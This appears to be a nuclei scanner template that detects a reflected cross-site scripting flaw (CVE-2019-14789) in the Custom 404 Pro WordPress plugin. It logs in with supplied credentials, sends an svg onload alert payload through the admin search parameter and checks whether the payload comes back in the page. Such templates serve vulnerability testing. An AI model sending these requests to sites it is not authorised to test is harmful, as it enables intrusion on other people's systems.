nuclei-templates/http/cves/2019/CVE-2019-14789.yaml

53 lines
2.3 KiB
YAML
Raw Normal View History

2023-07-07 09:38:49 +00:00
id: CVE-2019-14789
info:
name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:53:28 +00:00
remediation: |
Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability.
2023-07-07 09:38:49 +00:00
reference:
- https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd
- https://wordpress.org/plugins/custom-404-pro/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2019-14789
2023-07-11 19:49:27 +00:00
- https://wordpress.org/plugins/custom-404-pro/#developers
2023-07-07 09:38:49 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2023-07-07 09:38:49 +00:00
cvss-score: 6.1
cve-id: CVE-2019-14789
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00125
epss-percentile: 0.46648
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:*
2023-07-07 09:38:49 +00:00
metadata:
verified: true
2023-09-06 12:53:28 +00:00
max-request: 2
2023-08-31 11:46:18 +00:00
vendor: kunalnagar
2023-07-11 19:49:27 +00:00
product: custom_404_pro
2023-09-06 12:53:28 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: wpscan,cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar
2023-07-07 09:38:49 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "Custom 404 Pro")'
condition: and
# digest: 4a0a00473045022037b1df1234704dc3ea78794e73304f4a0441066990b1e3b9bd8942860b20b958022100879042183aaf455a7b154d26df4996a261dd6eb787311f35216fbee52b3b3f7e:922c64590222798bb761d5b6d8e72950